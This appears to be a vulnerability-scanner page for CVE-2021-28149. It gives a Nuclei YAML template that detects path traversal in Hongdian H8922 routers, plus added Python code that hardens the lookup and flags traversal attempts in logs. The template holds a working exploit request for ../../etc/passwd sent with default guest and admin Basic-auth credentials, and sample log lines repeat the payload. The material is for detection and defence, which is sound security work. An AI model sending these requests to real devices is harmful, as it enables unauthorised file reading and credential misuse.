Hongdian H8922 3.0.5 Devices - Local File Inclusion
ID: CVE-2021-28149
Severity: medium
Author: gy741
Tags: cve2021,cve,hongdian,traversal
Description
Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd). This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
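As an added example (not part of the template or of the vendor's firmware), the defender's side of this bug: a hardened lookup for the type parameter that confines the export to a log directory (the directory name is an assumption), and a check that flags traversal attempts against /log_download.cgi in constructed access-log lines, reporting the status so successful downloads stand out.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical directory the log export handler should be confined to.
LOG_DIR = "/srv/logs"

def resolve_log_path(type_param: str, log_dir: str = LOG_DIR):
    """Hardened lookup for the 'type' parameter: absolute file path, or
    None when the request escapes log_dir (double decode closes %252e)."""
    name = unquote(unquote(type_param))
    if "\x00" in name:
        return None
    base = os.path.realpath(log_dir)
    # join() drops log_dir for absolute names and realpath() collapses '..',
    # so the prefix test catches both; the separator rejects /srv/logs2.
    candidate = os.path.realpath(os.path.join(log_dir, name))
    if not candidate.startswith(base + os.sep):
        return None
    return candidate

TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")

def is_traversal_attempt(request_target: str) -> bool:
    """True when a request to /log_download.cgi carries '..' in 'type'."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/log_download.cgi"):
        return False
    for value in parse_qs(parts.query).get("type", []):  # decoded once here
        if TRAVERSAL.search(unquote(value)):  # second decode for %252e%252e
            return True
    return False

# Constructed access-log lines (common log format) for the detection below.
SAMPLE_LOG = [
    '203.0.113.7 - guest [12/Mar/2021:10:01:02 +0000] "GET /log_download.cgi?type=../../etc/passwd HTTP/1.1" 200 1024',
    '203.0.113.7 - admin [12/Mar/2021:10:01:05 +0000] "GET /log_download.cgi?type=system.log HTTP/1.1" 200 4096',
    '198.51.100.9 - - [12/Mar/2021:10:02:00 +0000] "GET /log_download.cgi?type=%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 403 0',
]
LOG_RE = re.compile(r'^\S+ \S+ (\S+) \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def flag_log_lines(lines):
    """(user, target, status) per traversal attempt on the export handler;
    status 200 means the device most likely served the requested file."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_traversal_attempt(m.group(2)):
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits
```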
YAML Source
id: CVE-2021-28149

info:
  name: Hongdian H8922 3.0.5 Devices - Local File Inclusion
  author: gy741
  severity: medium
  description: |
    Hongdian H8922 3.0.5 devices are vulnerable to local file inclusion. The /log_download.cgi log export handler does not validate user input and allows a remote attacker with minimal privileges to download any file from the device by substituting ../ (e.g., ../../etc/passwd) This can be carried out with a web browser by changing the file name accordingly. Upon visiting log_download.cgi?type=../../etc/passwd and logging in, the web server will allow a download of the contents of the /etc/passwd file.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized access to sensitive files, potentially leading to further compromise of the system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in Hongdian H8922 3.0.5 Devices.
  reference:
    - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/
    - http://en.hongdian.com/Products/Details/H8922
    - https://nvd.nist.gov/vuln/detail/CVE-2021-28149
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ArrestX/--POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-28149
    cwe-id: CWE-22
    epss-score: 0.05499
    epss-percentile: 0.93036
    cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hongdian
    product: h8922_firmware
  tags: cve2021,cve,hongdian,traversal

http:
  - raw:
      - |
        GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=

      - |
        GET /log_download.cgi?type=../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic YWRtaW46YWRtaW4=

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "sshd:[x*]"
          - "root:[$]"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dd89bbaafa891893c30ded7c9edc9a002c3c6a6bbe55f23a0a62ea2fcb34f83d022100b00d15db873660526881a4f261f6e804ef9d41f3ee52c8d9401788156045eef3:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-28149.yaml"